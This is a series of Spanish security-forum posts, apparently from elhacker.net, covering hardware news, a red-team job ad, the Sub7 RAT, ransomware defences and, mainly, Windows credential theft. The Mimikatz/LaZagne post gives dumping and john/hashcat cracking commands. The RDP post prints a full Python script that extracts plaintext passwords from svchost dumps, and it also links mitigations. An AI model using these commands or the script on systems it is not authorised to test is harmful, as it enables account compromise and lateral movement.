El Noctua NH-P1 se ha hecho esperar, pues fue anunciado por primera vez en Computex 2019, hace poco más de dos años. Desde entonces, cuando todavía era solo un proyecto, ha experimentado varios cambios en su diseño, que se han traducido en múltiples retrasos (su lanzamiento inicial estaba previsto para el cuarto trimestre de 2019). Ahora, tras un año y medio de espera desde la fecha anunciada en mayo de 2019, finalmente ha llegado al mercado.

Cajas compatibles



Para evitar el uso de ventilador, el Noctua NH-P1 cuenta con seis heatpipes de cobre que toman el calor de la superficie del procesador y lo llevan a las trece aletas de gran tamaño de aluminio niquelado que componen la parte superior del disipador. Es importante, eso sí, tener en cuenta que la caja empleada jugará un papel clave para que su capacidad de disipación sea efectiva. Aunque no son las únicas, Noctua ha publicado una lista con algunas de las las cajas recomendadas para su montaje. Como recomendaciones generales, el fabricante recomienda una caja de PC sin ventilador pero con una buena convección natural, una configuración abierta de tipo banco de pruebas, o una caja de PC con ventiladores.

https://ncc.noctua.at/recommended/NH-P1-68/cases

Listado Procesadores


Aunque al hablar de disipación pasiva solemos pensar en portátiles y ordenadores de pequeño tamaño y bajo rendimiento, disipadores como el Noctua NH-P1 parecen claramente diseñados para recordarnos que, en bastantes casos, los ventiladores no son la única solución para evacuar el calor que producen algunos de los centros neurálgicos de nuestros equipos de sobremesa. Para una caja grande, eso sí, pues como puedes comprobar en la imagen su tamaño es considerable.

El Noctua NH-P1 se ha hecho esperar, pues fue anunciado por primera vez en Computex 2019, hace poco más de dos años. Desde entonces, cuando todavía era solo un proyecto, ha experimentado varios cambios en su diseño, que se han traducido en múltiples retrasos (su lanzamiento inicial estaba previsto para el cuarto trimestre de 2019). Ahora, tras un año y medio de espera desde la fecha anunciada en mayo de 2019, finalmente ha llegado al mercado.

Para evitar el uso de ventilador, el Noctua NH-P1 cuenta con seis heatpipes de cobre que toman el calor de la superficie del procesador y lo llevan a las trece aletas de gran tamaño de aluminio niquelado que componen la parte superior del disipador. Es importante, eso sí, tener en cuenta que la caja empleada jugará un papel clave para que su capacidad de disipación sea efectiva. Aunque no son las únicas, Noctua ha publicado una lista con algunas de las las cajas recomendadas para su montaje. Como recomendaciones generales, el fabricante recomienda una caja de PC sin ventilador pero con una buena convección natural, una configuración abierta de tipo banco de pruebas, o una caja de PC con ventiladores.

Noctua NH-P1: disipación pasiva a lo bestia

En cuanto a su compatibilidad, por el lado de Intel se puede montar sobre micros en sockets LGA2066, LGA2011-0, LGA2011-3 (Square ILM), LGA1200, LGA1156, LGA1155, LGA1151 y LGA1150, y en el caso de AMD es compatible con los sockets AM2, AM2+, AM3, AM3+, FM1, FM2, FM2+ (en este caso será necesario emplear un backplate) y AM4. Más complejo es determinar los chips con los que sus capacidades de disipación serán suficientes, ya que Noctua no emplea el TDP para establecerla. Lo mejor, por lo tanto, es consultar la lista de procesadores compatibles aquí.

https://ncc.noctua.at/coolers/NH-P1-68/cpus/all

Como recomendación general, el fabricante indica que no es adecuado para sistemas en los que se haga overclocking, así como con procesadores que produzcan altas cargas térmicas. Fuera de este punto, eso sí, es posible utilizarlo con chips de última generación.

Si te preguntas por su tamaño, es prácticamente cúbico, con 158 milímetros de altura, 154 de anchura y 152 de fondo. Y para que quede clara la contundencia del Noctua NH-P1, su peso es de nada menos que 1.180 gramos. Medidas sin ventilador, pues aunque ha sido diseñado para funcionar de este modo, también permite el montaje de un ventilador de 120 milímetros, fin para el que Noctua recomienda su modelo NF-A12x25 LS-PWM.

El Noctua NH-P1ya se encuentra a la venta y su precio, sin ventilador pero con el kit de montaje completo, incluida la pasta térmica, es de 109,90 euros.



El disipador es sorprendentemente capaz, aunque como vemos se recomienda la inclusión de un ventilador. En concreto, se ofrece el NF-A12x25 LS-PWM como una ampliación opcional, siendo un ventilador semi-pasivo, por lo que podremos configurar su curva para que se mantenga sin funcionar la mayor parte del tiempo, y no perder la esencia de este disipador pasivo.

CitarEste ventilador opcional tiene un ruido máximo de 12.1db(A), ya que es de muy baja velocidad, perfecto para evitar eliminar la esencia de este disipador pasivo.


[youtube=640,360]https://www.youtube.com/watch?v=khbvxsPTI84[/youtube]
#19
Mercadona busca un hacker Técnico de Seguridad Ofensiva para protegerse del ransomware

Mercadona ha abierto hoy una vacante en su portal de empleo para seleccionar un Técnico en Seguridad Ofensiva que actúe como hacker, poniendo a prueba los sistemas de la compañía. Los ataques de ransomware y otros vectores están a la orden del día teniendo como objetivo las grandes empresas y la cadena de supermercados quiere tener a un aliado experto entre sus filas.

La plaza resulta bastante asequible puesto que solo se exige conocimientos en seguridad ofensiva y en el uso de lenguajes como Python, Bash, Golang y Java, además de pasión por las nuevas tecnologías. Sin embargo, se valora conocimientos más avanzados como:

CitarRequisitos:

- Conocimientos en seguridad ofensiva y en el uso de alguno de los siguientes lenguajes: Python, Bash, Golang, Java
- Disponibilidad horaria de lunes a viernes
- Carné de conducir y vehículo propio
- Capacidad de comunicación y trabajo en equipo
- Pasión e interés por las nuevas tecnologías

Conocimientos específicos

Se valorará:
- CFGS en Seguridad Informática o Grado en Ingeniería Informática o Telecomunicaciones
- Conocimientos de metodologías de pruebas de seguridad (OWASP, OSSTMM, SANS, OWISAM, OASAM)
- Experiencia en ejercicios Red Team y/o pentesting
- Certificado en CEH, OSCP, OSCE, CISSP, CISA, CISM, etc

Tareas

Buscamos técnicos/as para unirse al equipo de trabajo que está desarrollando la tecnología para abordar la transformación digital de la empresa.

Tus tareas serán:
- Poner a prueba la seguridad de los sistemas (ej. detectar y explotar vulnerabilidades en los sistemas)
- Utilizar herramientas para automatización de ataques (ej. nikto, metasploit, ZAP, burp suite, etc.)
- Realizar ejercicios periódicos de seguridad simulando escenarios (ej. simular ataque externo, robo de credenciales, accesos no autorizados, etc.)

El contrato es indefinido con jornada laboral completa y un salario bruto de entre 23 a 35 mil € anuales.


Oferta:
https://mercadona.avature.net/es_ES/Careers/JobDetail/T-CNICO-A-SEGURIDAD-OFENSIVA-RED-TEAM/27534#

Oferta de empleo en Linkedin
https://es.linkedin.com/jobs/view/t%C3%A9cnico-a-seguridad-ofensiva-red-team-at-mercadona-2583174591



Fuente:
https://bandaancha.eu/foros/mercadona-ofrece-puesto-tecnico-1743004
#20
Sub7crew, los creadores del popular Sub7 RAT (Troyano de Acceso Remoto), han regresado después de varios años de inactividad

El legendario RAT (Troyano de Acceso Remoto) vuelve en 2021. Nacido en 1999.



https://sub7crew.org

Historia:
https://www.sub7crew.org/history/

Se hizo realmente popular en los años 199-2000 y 2001 justo cuando nació el foro.

En 2010 también "volvió" tras 6 años de parón:

CitarEl proyecto de la herramienta de administración remota (con ciertas funcionalidades especiales propias de un troyano) SubSeven ha vuelto, tras 6 años descansando con unas merecidas vacaciones. El pasado verano, su creador, mobman, hizo públicas sus intenciones de retomar este proyecto, y finalmente ya se ha lanzado la nueva versión, correspondiente con la 2.3.
Es uno de los troyanos más famosos de la época, que cualquier persona quería saber como utilizar, sin discriminar edad, sexo, condición o motivaciones. La mayoría tenía claro que servía para entrar en el ordenador de X y que todo el mundo picaba por messenger. Programado en Borland Delphi, ha pasado por más de 15 versiones, algunas de ellas creadas especialmente para determinadas ocasiones (Para la octava edición de DefCON, la 2.1.5 denominada edición aniversario...). Si queréis curiosear con ellas, en esta página tendréis una recopilación de todas las publicadas:


Fuente:
http://www.securitybydefault.com/2010/03/vuelve-el-troyano-subseven-tras-6-anos.html
#21
Mimikatz (mimi katz) se convirtió en una herramienta de ataque extremadamente efectiva contra los clientes de Windows, permitiendo recuperar las contraseñas seguras, así como los hashes de contraseñas en memoria. Bautizada como la navaja suiza de las herramientas de obtención de credenciales para Windows como también , Windows Credential Editor (WCE) de Hernán Ochoa.



Mimikatz, escrito por primera vez por el francés Benjamin Delpy (akk gentilkiwi) en 2011, ha simplificado y automatizado en gran medida la recopilación de credenciales en los sistemas de Windows.

Mimikatz: cute cat


Mimikatz es una utilidad de código abierto que permite ver la información de credenciales del Windows lsass (Servicio de Subsistema de la Autoridad de Seguridad Local) a través de su módulo sekurlsa que incluye contraseñas de texto plano y tickets Kerberos que luego podrían usarse para ataques como pass-the-hash y pase el boleto. La mayoría de las herramientas antivirus detectarán la presencia de Mimikatz como una amenaza y la eliminarán, pero puede ser interesante probar la seguridad en los sistemas.

Mimikatz proporciona una gran cantidad de herramientas para recopilar y hacer uso de Windows credenciales en los sistemas de destino, incluida la recuperación de contraseñas de texto claro, Lan Manager hashes y hashes NTLM, certificados y tickets de Kerberos. Las herramientas se ejecutan con diferentes éxito en todas las versiones de Windows desde XP hacia adelante, con una funcionalidad algo limitado en Windows 8.1 y posterior.




También ha salido a relucir como un componente de dos gusanos ransomware que han atravesado Ucrania y se han extendido por Europa, Rusia y EE. UU .: Tanto el ransomware NotPetya como BadRabbit utilizaron a Mimikatz junto con herramientas filtradas de la NSA para crear ataques automatizados cuyas infecciones saturaron rápidamente las redes, con resultados desastrosos. NotPetya solo llevó a la parálisis de miles de computadoras en compañías como Maersk, Merck y FedEx, y se cree que ha causado más de mil millones de dólares en daños y perjuicios.






NTHash (NTLM)

Así es como se almacenan las contraseñas en los sistemas Windows. Este tipo de hash se puede obtener volcando la base de datos SAM o usando Mimikatz. También se almacenan en controladores de dominio en el archivo NTDS. Estos son los hash que puede utilizar para pasar la técnica de hash.




Ejemplo de NTHash:


Citardfdedf4b5ec0e2f9042db9ccef992507



NTHashes se almacenan en la base de datos del Administrador de cuentas de seguridad (SAM) y en la base de datos NTDS.dit del controlador de dominio. Un volcado de hash de Windows se verá así:




CitarAdministrador: 500: aad3b435b51404eeaad3b435b51404ee: dfdedf4b5ec0e2f9042db9ccef992507 :::



Que tiene este formato:


<Nombre de usuario>: <ID de usuario>: <Hash LM>: <Hash NT>: <Comment>: <Home Dir>:


Cuando veas que el hash de LM es aad3b435b51404eeaad3b435b51404ee, es el hash literal de sin contraseña y esto depende de su herramienta de volcado, también puede encontrar esta cadena llena de ceros. Esto es así cuando el hash LM está vacío.


Crackear


Citar
john --format = nt hash.txt

hashcat -m 1000 -a 3 hash.txt


Net-NTLMv1 / v2 también conocido como NTLMv1 / v2Permalink


El protocolo Net-NTLM utiliza NTHash en un desafío / respuesta entre un servidor y un cliente.


Puede obtener estos valores hash cuando utilice herramientas como Responder o Inveigh.

Citar
admin :: N46iSNekpT: 08ca45b7d7ea58ee: 88dcbe4446168966a153a0064958dac6: 5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c30db765


Net-NTLMv1


Citarjohn --format = netntlm hash.txt

hashcat -m 5500 -a 3 hash.txt




Net-NTLMv2


Citar
john --format = netntlmv2 hash.txt

hashcat -m 5600 -a 3 hash.txt


WDigest


Mimikatz se convirtió por primera vez en un activo clave para hackers gracias a su capacidad para explotar una oscura función de Windows llamada WDigest. Esa función está diseñada para hacer que sea más conveniente para los usuarios de Windows corporativos y gubernamentales probar su identidad a diferentes aplicaciones en su red o en la web; contiene sus credenciales de autenticación en la memoria y las reutiliza automáticamente, por lo que solo tienen que ingresar su nombre de usuario y contraseña una vez. Mientras Windows mantiene cifrada la copia de la contraseña del usuario, también guarda una copia de la clave secreta para descifrarla también en la memoria


En 2014, Microsoft respondió a este agujero de seguridad con un parche que permite a los administradores del sistema deshabilitar las contraseñas "WDigest" para que no se almacenen. Este aviso de Microsoft explica cómo deberán actualizar una entrada de registro especial.


CitarHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest



https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a



Esta solución Fix it cambia la clave del Registro UseLogonCredential para que las contraseñas WDigest no se almacenen en la memoria.


En Windows 8 y superiores, la configuración predeterminada es no almacenar contraseñas de texto claro en lsass.





mimikatz viene en dos sabores: x64 o Win32, dependiendo de su versión de Windows (32/64 bits).
El sabor de Win32 no puede acceder a la memoria de proceso de 64 bits (como lsass), pero puede abrir un minivolcado de 32 bits en Windows 64 bits. Algunas operaciones necesitan privilegios de administrador o token de sistema, así que tenga en cuenta el UAC de la versión de Vista.

https://github.com/gentilkiwi/mimikatz/




privilege::debug
inject::process lsass.exe s
ekurlsa.dll@getLogonPasswords
sekurlsa::logonpasswords

Más ejemplos de uso:

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html



Módulos de uso de mimikatz con Metasploit



Citarmeterpreter > mimikatz_command -f fu::
Module : 'fu' introuvable

Modules disponibles :
               - Standard
     crypto    - Cryptographie et certificats
       hash    - Hash
     system    - Gestion système
    process    - Manipulation des processus
     thread    - Manipulation des threads
    service    - Manipulation des services
  privilege    - Manipulation des privilèges
     handle    - Manipulation des handles
impersonate    - Manipulation tokens d'accès
    winmine    - Manipulation du démineur
minesweeper    - Manipulation du démineur 7
      nogpo    - Anti-gpo et patchs divers
    samdump    - Dump de SAM
     inject    - Injecteur de librairies
         ts    - Terminal Server
     divers    - Fonctions diverses n'ayant pas encore assez de corps pour
avoir leurs propres module
   sekurlsa    - Dump des sessions courantes par providers LSASS
        efs    - Manipulations EFS



https://www.offensive-security.com/metasploit-unleashed/mimikatz/




Módulos de mimikatz

standard
privilege
crypto
sekurlsa
kerberos
lsadump
vault
token
event
ts
process
service
net
misc
library mimilib
driver mimidrv




Características técnicas (features)

- Dump credentials from LSASS (Windows Local Security Account database)
- MSV1.0: hashes & keys (dpapi)
- Kerberos password, ekeys, tickets, & PIN
- TsPkg (password)
- WDigest (clear-text password)
- LiveSSP (clear-text password)
- SSP (clear-text password)
- Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
- Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
- Export certificates and keys (even those not normally exportable).
- Dump cached credentials
- Stop event monitoring.
- Bypass Microsoft AppLocker / Software Restriction Polcies
- Patch Terminal Server
- Basic GPO bypass

lsadump::postzerologon, vulnerabilidad CVE-2020-1472 aka ZeroLogon detection, exploit, DCSync support (Netlogon Elevation of Privilege Vulnerability)



Reglas Yara para la detección de la herramienta

https://yara.adlice.com/view.php?id=12339



Fuentes:
https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/

Proyecto LaZagne



El proyecto LaZagne es un aplicación de código abierto usada para recuperar multitud de contraseñas almacenadas en equipos locales. Muchos productos de software almacenan contraseñas de acceso usando diferentes técnicas, desde el texto plano común, pasando por bases de datos, API's y algoritmos propios.

Windows:


- Autologon
- MSCache
- Credential Files
- Credman
- DPAPI Hash
- Hashdump (LM/NT)
- LSA secret
- Vault Files


Esta herramienta fue desarrollada con el propósito de encontrar dichas contraseñas para los productos de software más comúnmente usados. Actualmente soporta multidud de programas de Windows y múltiples sistemas operativos Linux/Unix:







En el repositorio GitHub del producto hay mayores detalles sobre su uso y alternativas para extenderlo.

https://github.com/AlessandroZ/LaZagne



Una precaución importante que podemos tomar en nuestros equipos, para evitar los hallazgos de programas como LaZagne es limpiar los rastros de nuestras actividades, por ejemplo a través de un programa como CCleaner (si bien no elimina todo lo que LaZagne encuentra, si lo hace con todo lo relacionado a las pistas que quedan del uso de los navegadores de Internet por ejemplo).


Elaboración propia con

Fuentes varias:
https://arduinosecurity.blogspot.com.es/2016/07/el-proyecto-lazagne.html
Vía:
http://blog.segu-info.com.ar/2017/11/lazagne-recupera-contrasenas.html
#22
Anuncio sobre la privacidad de iPhone (Apple)

[youtube=640,360]https://www.youtube.com/watch?v=qrtn4HBcVDQ[/youtube]

Es de un país sudamericano por el acento, creo que México ¿?

El anuncio está relacionado con los nuevos permisos de privacidad de Apple

App Tracking Transparency en los dispositivos Apple
https://blog.elhacker.net/2021/05/actualizacion-ios-14-5-trae-nuevos-controles-de-privacidad-app-tracking.html
#23
La Universidad de Duke (EE. UU.) ha diseñado un dispositivo con un algoritmo para evaluar la forma y detectar sangre en los excrementos de los pacientes.




La Universidad de Duke (Estados Unidos) está desarrollando un dispositivo con inteligencia artificial que puede incorporarse al inodoro y analizar las heces de las personas. Según su presentación en la Digestive Disease Week, este invento podría dotar a los gastroenterólogos de la información necesaria para encontrar el tratamiento ideal para los pacientes.
'El inodoro inteligente' es capaz de reconocer a cada usuario por su 'huella anal'.
Así es el 'inodoro inteligente', un váter capaz de reconocer a cada usuario por sus deposiciones y monitorizar su salud

Los desarrolladores, que han llamado a esta herramienta 'Duke Smart Toilet Lab' han explicado que esta tecnología ayudaría a aquellos que cuentan con problemas gastrointestinales crónicos, como la enfermedad inflamatoria intestinal y el síndrome del intestino irritable.

Deborah Fisher, una de las autoras del estudio y profesora asociada de medicina en la Universidad de Duke explica que "por lo general, los gastroenterólogos tienen que confiar en la información sobre las heces que el propio paciente les comunica para ayudar a determinar la causa de sus problemas de salud gastrointestinales, lo cual puede ser muy poco fiable".

"Los pacientes a menudo no pueden recordar el aspecto de sus heces o la frecuencia con la que defecan, lo que forma parte del proceso de control estándar -señala Fisher-. La tecnología del inodoro inteligente nos permitirá reunir la información a largo plazo necesaria para realizar un diagnóstico más preciso y oportuno de los problemas gastrointestinales crónicos".

El estudio asegura que el dispositivo que han desarrollado ofrecería datos sobre los excrementos para mejorar la salud individual y comunitaria. Para ello, la investigación se centra en el diseño de una tecnología que recoja y analice las heces y la orina, una tecnología que haga una evaluación intestinal y el desarrollo de soluciones para obtener una detección rápida y responder a los brotes de enfermedades.

El Duke Smart Toilet Lab puede instalarse en las tuberías de un inodoro ya existente. Con este aparato, el inodoro toma imágenes de las heces dentro de las tuberías y, con los datos recogidos, permite que los expertos puedan conocer mejor la salud del paciente.

Los investigadores del estudio afirman que, para crear su herramienta de imágenes, analizaron 3.328 imágenes de heces encontradas en Internet o proporcionadas por los propios participantes. Estas fueron revisadas por gastroenterólogos según la escala de heces de Bristol.

La escala de heces de Bristol.Cabot Health, Bristol Stool Chart





A través de un enfoque de redes neuronales convolucionales, lograron un algoritmo que era capaz de clasificar con precisión la forma de las heces el 84'1% de las veces. Asimismo, este algoritmo también detectaba la sangre bruta el 76'3% de las veces.

Sonia Grego, investigadora principal del estudio y directora fundadora del Duke Smart Toilet Lab, afirmó que "un brote de una enfermedad inflamatoria intestinal podría diagnosticarse con el inodoro inteligente". "Esto podría ser especialmente útil para los pacientes que viven en centros de atención a largo plazo que no pueden informar de sus condiciones y podría ayudar a mejorar el diagnóstico inicial de las patologías agudas", confirma Grego.

Aunque el prototipo no esté disponible para el público, los investigadores se muestran positivos por su viabilidad prometedora.

Fuente:
https://www.20minutos.es/tecnologia/moviles-dispositivos/crean-un-inodoro-inteligente-capaz-de-analizar-heces-para-detectar-y-tratar-problemas-de-salud-4706977/
#24
Muy rara la imagen de la publicidad de Google:



Me imagino que ya han retirado el anuncio por no cumplir con la normativa.

URL donde apreció el anuncio:

https://ubunlog.com/he-probado-ubuntu-21-04-en-la-raspberry-pi-4-y-lo-siento-pero-no/
Y el enlace llevaba a:

https://achuweinch.cf/?utm_term=&utm_content=523656323270&utm_campaign=13230577911&utm_position=none&utm_network=d&utm_target=&utm_placement=ubunlog.com&utm_match=

Supporting subsistence farming while conserving land and biodiversity in Morocco

Nada que ver con la foto....
#25
Un Captcha que se resuelve jugando DOOM (juego de ID Software)

Es una prueba de concepto, nada funcional, pero es una idea bien ingeniosa




Demo:
https://vivirenremoto.github.io/doomcaptcha/

Desde luego es una forma muy original y más divertida de completar el tradicional  - típico captcha de imágenes.
#26
Wireless en Linux / Wifislax 64 KDE 5 Plasma
19 Mayo 2021, 17:09 PM


Hashcat = O.K.
Navegación Chrome = O.K.
Panel de control de Nvidia = O.K.
Airgeddon = O.K.

19/05/2021
01 - Actualizado pocl-1.6 --> 1.7
02 - Actualizados firmwares de sistema
03 - Actualizado hcxtools-6.1.6 --> 6.2.0
04 - Actualizado hcxkeys-6.0.0 --> 6.2.0
05 - Actualizado hcxdumptool-6.1.6 --> 6.2.0

Descarga:
https://mega.nz/folder/P1YDBKYK#-X1zV0zIjpDuVi8Cc9ZAgA

ISO
https://mega.nz/file/W0w2DQKI#UyG039eZcV4TFwLUri15uRQhj45HsueNsC6blYE-4Q0

Mirror
https://ns2.elhacker.net/isos/WIFISLAX-CURRENT-PLASMA.zip

Entrada en el blog:
https://blog.elhacker.net/2021/05/isponible-la-ultima-version-wifislax64-2021-kde5-plasma.html
#27
Es posible extraer credenciales (usuario y contraseña) de inicio de sesión en texto plano en Windows escritorio remoto (RDP) del proceso de svchost.exe

Así lo ha descubierto el investigador Jonas, famoso recientemente por descubrir dos bugs (errores) en el sistema de archivos NTFS

Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html


Una simple búsqueda de cadena dentro de la memoria del proceso para svchost.exe revela la contraseña de texto sin formato que se utilizó para conectarse al sistema a través de RDP.

- La contraseña de texto sin formato está presente. La mayoría de los sistemas Windows modernos ya no tienen wdigest habilitado, por lo que encontrar credenciales de texto sin formato en la memoria es mucho más raro.
- La contraseña está en svchost.exe, a diferencia de lsass.exe. Esto significa que es posible que las herramientas defensivas para detectar / evitar el volcado de contraseñas de la memoria no puedan detectar esto.

Probé esto varias veces, así como muchas otras, y hasta ahora he observado lo siguiente:

- Esto parece funcionar en Windows 10, Windows Sever 2016, Windows Server 2012. Probablemente también en otros, pero hasta ahora lo he visto exitoso contra ellos.
- Según el autor del tweet y otros evaluadores, parece funcionar para cuentas locales y de dominio.
- No parece ser consistente. A veces, la contraseña está ahí, a veces no. No sé exactamente por qué es así. Parece existir en la memoria durante un largo período de tiempo, pero se desconoce cuánto tiempo.


Encuentra el proceso correcto. He visto algunas formas de hacerlo.

   Utilizando la herramienta Process Hacker 2. Ves a la pestaña Red y busca el proceso que tiene una conexión RDP. Esto solo funciona si la conexión RDP aún está activa.




Visto en:
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/

El creador de la conocida herramienta mimikatz ha añadido recientemente la funcionalidad:



[youtube=640,360]https://www.youtube.com/watch?v=coBANSJhJnE[/youtube]

2.2.0 20210517 Terminal Server Passwords
https://github.com/gentilkiwi/mimikatz/releases

Mitigaciones:

Protect Remote Desktop credentials with Windows Defender Remote Credential Guard
https://docs.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard

Windows Defender Credential Guard: Requirements
https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-requirements


Script Python
RDP_clear.py
https://gist.github.com/k4nfr3/ca2c392572da645661b62f9a71f28ba3

Código (python) [Seleccionar]
import re
from collections import namedtuple
import sys

# Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
# borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
# code inspired by  @gentilkiwi 's video
# This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
# I'm no dev so PR and constructive remarks are welcome


ASCII_BYTE = rb" !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t"

RDP_Strings = ['RDPDD', 'RDV::RDP::NetDetect::BandwidthChange']  #Server 2008 and Server 2016 tested only

String = namedtuple("String", ["s", "offset"])


def ascii_strings(buf, n=4):
   reg = rb"([%s]{%d,})" % (ASCII_BYTE, n)
   ascii_re = re.compile(reg)
   for match in ascii_re.finditer(buf):
       yield String(match.group().decode("ascii"), match.start())

def unicode_strings(buf, n=4):
   reg = rb"((?:[%s]\x00){%d,})" % (ASCII_BYTE, n)
   uni_re = re.compile(reg)
   for match in uni_re.finditer(buf):
       try:
           yield String(match.group().decode("utf-16"), match.start())
       except UnicodeDecodeError:
           pass


def getdomain(buf):
   return buf.decode("UTF-16)")

def banner():
   print(' _____ ____  _____           _             ')
   print('| __  |    \|  _  |      ___| |___ ___ ___ ')
   print('|    -|  |  |   __|     |  _| | -_| .\'|  _|')
   print('|__|__|____/|__|   _____|___|_|___|__,|_|  ')
   print('                  |_____|                  ')



def main():
   import sys

   SVCHOST = False
   Last1 = ""
   Last2 = ""
   Last3 = ""
   SERVERNAME=""
   with open(sys.argv[1], 'rb') as f:
       b = f.read()

   for s in ascii_strings(b, n=4):
       if format(s.s).find("svchost.exe -k termsvcs")!=-1:
           print('[*] Analyse of dump of process : {:s}'.format( s.s))
           SVCHOST = True
       if format(s.s).find("COMPUTERNAME=")!=-1:
           #print('[+] SERVERNAME : ' +s.s[13:])
           SERVERNAME=s.s[13:]
           break

   if (SVCHOST):
       print("\n")
       for s in unicode_strings(b):
           #print('[+] {:d} 0x{:d}: {:s}'.format(0,s.offset, s.s))

           if s.s in RDP_Strings:
               if (s.offset - Last1.offset) < 3000:
                   if (Last1.offset-Last2.offset==512):
                       #print('[+] User :{:d} 0x{:d}: {:s}'.format((s.offset - Last2.offset), Last2.offset, Last2.s))
                       print('[+] User : \t{:s}'.format(Last2.s))
                       #print('[+] Password : {:d} 0x{:d}: {:s}'.format((s.offset - Last1.offset), Last1.offset, Last1.s))
                       print('[+] Password : \t{:s}'.format(Last1.s))
                       if ((Last2.offset-Last3.offset) == 512) :
                           print('[+] Domain : \t{:d} 0x{:d}: {:s}'.format((s.offset - Last3.offset), Last3.offset, Last3.s))
                           break
                       else:
                           # bug in case string is less than 4 char
                           domain = b[Last2.offset-512:Last2.offset]
                           if getdomain(domain).strip('\x00')!="":
                               print('[+] Domain : \t{:s}'.format(getdomain(domain)))
                           else:  # can be empty, then it's local
                               print("[+] ServerName : \t"+SERVERNAME)
                           break

           Last3=Last2
           Last2=Last1
           Last1=s

   else:
       print(sys.argv[1] + " doesn't seem to be a svchost dump file")


if __name__ == "__main__":
   banner()
   if len(sys.argv) != 2:
       print("\n\nDump svchost process which listens to port 3389 port with any procdump tool")
       print("")
       print("Usage: " + sys.argv[0] + " svchost.dmp")
       exit(0)
   main()


Otras herramientas extracción credenciales en Windows

- mimikatz https://github.com/gentilkiwi/mimikatz
- Proyecto LaZagne https://github.com/AlessandroZ/LaZagne/
- Pypykatz (mimikatz) en Python https://github.com/skelsec/pypykatz
- Nishang (PowerShell) https://github.com/samratashok/nishang
- CrackMapExec CME https://github.com/byt3bl33d3r/CrackMapExec
#28
¿Cuál es la manera más efectiva de proteger tu empresa contra un ataque de Ransomware?

Las lista de empresas afectadas cada día es más importante y grande:

El Sepe (Servicio de Empleo Publico Estatal de España , Adif, Acer,  Finsa, The Phone House, los Houston Rockets , Kia Motors, Whirlpool, Ayuntamientos, Ciudades, Departamentos de Policía. Hospitales, SegurCaixa Adeslas, Mapfre, Canon, Garmin, Orange, LG, Cadena Ser, Everis, Boeing,

Consejo profesional ¿cómo nos protegemos del ransomware?

- Instalar el teclado ruso en Windows en Windows (agregar) (No tienes que usarlo)
- Muchos ransomware no se iniciarán en sistemas en los que estén instalados ciertos teclados cirílicos
- Probablemente se la solución más simple pero efectiva de todas.

Añadir teclado Ruso vía registro:
https://github.com/Unit221B/Russian

https://twitter.com/elhackernet/status/1392229408992268292

No es una idea precisamente nueva:

Por ejemplo dicen que es exactamente lo primero que hace MinervaLabs para prevenir ataques de Ransomware

https://twitter.com/bry_campbell/status/1228288875799498753

https://twitter.com/briankrebs/status/1392163072970829830

Rusia y su relación con el ransomware
https://blog.elhacker.net/2021/04/rusia-y-su-relacion-conexion-el-ransomware.html

Otra idea igual de tonta, simple pero efectiva es hacer ver que tu sistema es una máquina virtual. Muchos ransomware hacen comprobaciones para ver que no estén siendo analizados de manera que si detecta que es una máquina virtual detiene el proceso.

https://github.com/d4rksystem/VMwareCloak

Lógicamente si la medida se hace popular, pues los autores de ransomware harán otro tipo de comprobaciones y no servirá de nada.

La manera más "lógica" a priori de saber si un dispositivo pertenece a Rusia es mirar la dirección IP, pero es mucho más fiable el teclado. Todos los trabajadores rusos que usen una VPN con una IP de otro país no serían detectados.

Consejos tradicionales

- Securizar RDP - Remote Desktop Protocol
- Segmentar la red - Segmentación de la red
- Cómo protegerse Ransomware de forma gratuita con Windows 10 con Windows Defender
- Herramientas específicas de protección (Anti-Ransom) Raccine
- Desactivar Windows Script Host
- Desactivar macros Microsoft Office
- Deshabilitar Powershell


Fuente:
Medidas prevención para evitar que un ransomware secuestre tu empresa
https://blog.elhacker.net/2021/03/medidas-prevencion-para-evitar-que-un-ransomware-cifre-tu-empresa.html

Medidas prevención ataques de ransomware

1- Segmentar la red
2- Control tráfico entrada-salida
3- Actualizar
4-  Copias de seguridad
5- Acceso remoto limitado
6- Contraseñas texto plano
7-  Cifrado
8- Wifi invitados
9- IDS/IPS
10- Denunciar
11- Bloquear macros Office

Fuente:
https://glider.es/las-10-claves-del-exito/
#29
Han pasado 15 años desde que Calibri sustituyó a Times New Roman y Arial como la fuente predeterminada de Word, PowerPoint, Outlook y Excel. Ahora Microsoft ha encargado cinco nuevas tipografías sans serif para acabar con el reinado de Calibri, y está pidiendo ayuda a los usuarios para decidirse por una.






Microsoft ha comenzado a recopilar hoy mismo comentarios sobre las cinco nuevas fuentes, y planea establecer una de ellas como la tipografía predeterminada de Office a partir de 2022. Las cinco fuentes son:

   Bierstadt: creada por Steve Mattison, está inspirada en las tipografías suizas de mediados del siglo XX como la famosa Helvetica, con cortes claros en las terminaciones de los trazos, pero con un suavizado sutil para evitar la rigidez de los caracteres.
   Grandview: creada por Aaron Bell, se inspira en las señales de las carreteras y los ferrocarriles alemanes, diseñados para ser muy legibles, con algunos ajustes para que resulte cómoda la lectura de formatos largos.
   Seaford: creada por Tobias Frere-Jones, Nina Stössinger y Fred Shallcrass, reimagina las clásicas tipografías con serifas en un formato sans serif que resulta familiar y al mismo tiempo confortable para textos largos.
